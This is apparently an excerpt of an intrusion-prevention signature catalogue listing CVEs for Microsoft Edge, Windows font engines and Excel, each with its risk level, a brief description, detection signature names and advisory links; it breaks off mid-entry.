
Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8459

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8459

References:

CVE-2018-8459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8459

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8643

About this vulnerability:

A vulnerability in Microsoft Edge's Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists an out-of-bounds vulnerability in Internet Explorer 11. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Intenet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2018-8643

References:

CVE-2018-8643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8643

ms18-dec
http://technet.microsoft.com/security/bulletin/ms18-dec

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0539

About this vulnerability:

A vulnerability in Microsoft Edge's Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1124-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0539

References:

CVE-2019-0539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0539

ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0565

About this vulnerability:

A vulnerability in Microsoft Edge's Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1124-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0565

References:

CVE-2019-0565
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0565

ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0568

About this vulnerability:

A vulnerability in Microsoft Edge's Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1124-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0568

References:

CVE-2019-0568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0568

ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan

Microsoft-Edge-Security-Feature-Bypass-CVE-2016-3198

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a security feature bypass vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Security-Feature-Bypass-CVE-2016-3198

References:

CVE-2016-3198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3198

MS16-068
http://technet.microsoft.com/security/bulletin/MS16-068

Microsoft-Edge-Spoofing-Vulnerability-2018-8383

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There is a memory vulnerability in Microsoft Edge. A remote attacker can use this to spoof the identity of a web site.

Situation:

File-Text_Microsoft-Edge-Spoofing-Vulnerability-CVE-2018-8383

References:

CVE-2018-8383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8383

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Edge-Type-Confusion-CVE-2018-8588

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1115-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in the Microsoft Scripting Engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-CVE-2018-8588

References:

CVE-2018-8588
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8588

ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov

Microsoft-Edge-Type-Confusion-Remote-Code-Execution-CVE-2017-8524

About this vulnerability:

Microsoft Edge Type Confusion Remote Code Execution CVE-2017-8524 vulnerability

Risk:

High

First detected in:

sgpkg-ips-930-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

A Type Confusion vulnerability in Microsoft Edge which enables remote attackers to execute remote code.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Remote-Code-Execution-CVE-2017-8524

References:

CVE-2017-8524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8524

ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2017-8601

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-944-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A successful exploitation causes an access violation.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2017-8601

References:

CVE-2017-8601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8601

ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0951

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There has been reported a type confusion vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0951

References:

CVE-2018-0951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0951

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0953

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0953

References:

CVE-2018-0953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0953

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0993

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There has been reported a use-after-free vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0993

References:

CVE-2018-0993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0993

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8133

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8133

References:

CVE-2018-8133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8133

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8179

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8179

References:

CVE-2018-8179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8179

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8583

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8583

References:

CVE-2018-8583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8583

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8618

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8618

References:

CVE-2018-8618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8618

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8624

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8624

References:

CVE-2018-8624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8624

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8629

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8629

References:

CVE-2018-8629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8629

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0590

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0590

References:

CVE-2019-0590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0590

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0591

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0591

References:

CVE-2019-0591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0591

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0593

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0593

References:

CVE-2019-0593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0593

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0606

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0606

References:

CVE-2019-0606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0606

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0607

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0607

References:

CVE-2019-0607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0607

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0650

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0650

References:

CVE-2019-0650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0650

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0651

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0651

References:

CVE-2019-0651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0651

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0655

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0655

References:

CVE-2019-0655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0655

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Typedarray.sort-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-859-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Typedarray.sort-Use-After-Free

References:

CVE-2016-7288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7288

MS16-145
http://technet.microsoft.com/security/bulletin/MS16-145

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2017-8605

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-944-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a use after free vulnerability in Microsoft Edge. A successful exploitation can allow a remote attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2017-8605

References:

CVE-2017-8605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8605

ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0946

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There has been reported a use-after-free vulnerability in Microsoft Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0946

References:

CVE-2018-0946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0946

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0954

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0954

References:

CVE-2018-0954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0954

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0995

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018

References:

CVE-2018-0995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0995

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-8123

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

Situation:

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-8123

References:

CVE-2018-8123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8123

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0640

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0640

References:

CVE-2019-0640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0640

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0645

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0645

References:

CVE-2019-0645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0645

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Vulnerability-CVE-2016-3264

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-778-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists a vulnerability in Microsoft Edge.

References:

CVE-2016-3264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3264

MS16-085
http://technet.microsoft.com/security/bulletin/MS16-085

Microsoft-Embedded-OpenType-EOT-Font-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Microsoft Windows Embedded OpenType (EOT) Font Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Embedded-OpenType-EOT-Font-Integer-Overflow

References:

CVE-2010-1883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1883

BID-43775
http://www.securityfocus.com/bid/43775

MS10-076
http://technet.microsoft.com/security/bulletin/MS10-076

Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow

About this vulnerability:

A vulnerability in Microsoft Embedded OpenType Font Engine

Risk:

High

First detected in:

sgpkg-ips-231-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008

Software:

<os>

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Embedded OpenType Font Engine.

Situation:

HTTP_SS-Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow
File-Binary_Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow

References:

CVE-2009-0231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231

OSVDB-55842
http://www.osvdb.org/55842

MS09-029
http://technet.microsoft.com/security/bulletin/MS09-029

Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Embedded OpenType Font Engine

Risk:

High

First detected in:

sgpkg-ips-231-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008

Software:

<os>

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Embedded OpenType Font Engine.

Situation:

HTTP_SS-Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow
File-Binary_Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow

References:

CVE-2009-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0232

MS09-029
http://technet.microsoft.com/security/bulletin/MS09-029

Microsoft-Embedded-Web-Font-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Microsoft Windows embedded web font handling

Risk:

High

First detected in:

sgpkg-ips-54-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the Microsoft Windows embedded web font handling component. The data of the embedded font is defined in an EOT (Embedded Open Type) file. A remote attacker is able to create a malicious EOT file which is refered to by an HTML document. If the user views the document then the malicious EOT file is downloaded and processed on the victim host. This allows the attacker to execute arbitrary code on the victim machine.

Situation:

HTTP_Microsoft-Embedded-Font-EOT-File-Reference
E-Mail_BS-Microsoft-Embedded-Font-EOT-File-Reference
File-Binary_Microsoft-Embedded-Font-EOT-File-Reference
File-Text_Microsoft-Embedded-Font-EOT-File-Reference

References:

CVE-2006-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0010

BID-16194
http://www.securityfocus.com/bid/16194

OSVDB-18829
http://www.osvdb.org/18829

MS06-002
http://technet.microsoft.com/security/bulletin/MS06-002

Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978

About this vulnerability:

An attempt to exploit Excel vulnerability CVE-2011-0978

Risk:

Moderate

First detected in:

sgpkg-ips-387-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978
File-OLE_Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978

References:

CVE-2011-0978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0978

MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021

Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990
File-OLE_Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990

References:

CVE-2011-1990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1990

MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072

Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Excel. The vulnerability is due to insufficient validation of input values when parsing the Axisparent record from a spreadsheet file. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution
File-OLE_Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution

References:

CVE-2008-3004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3004

BID-30638
http://www.securityfocus.com/bid/30638

MS08-042
http://technet.microsoft.com/security/bulletin/MS08-042

Microsoft-Excel-Biff-File-Format-Named-Graph-Record-Parsing-Stack-Overflow

About this vulnerability:

A stack overflow vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Excel and Microsoft Excel Viewer. The vulnerability is the result of insufficient boundary checking when parsing a Named Graph Record from native OLE formatted files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

File-OLE_Microsoft-Excel-Named-Graph-Record-Parsing-Stack-Overflow

References:

CVE-2007-0215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0215

BID-23760
http://www.securityfocus.com/bid/23760

OSVDB-34393
http://www.osvdb.org/34393

MS07-023
http://technet.microsoft.com/security/bulletin/MS07-023

Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Excel detected

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

Vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276
File-TextId_Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276

References:

CVE-2011-1276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1276

OSVDB-72924
http://www.osvdb.org/72924

MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045

Microsoft-Excel-Colinfo-Record-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Works

Type:

Buffer Overflow

Description:

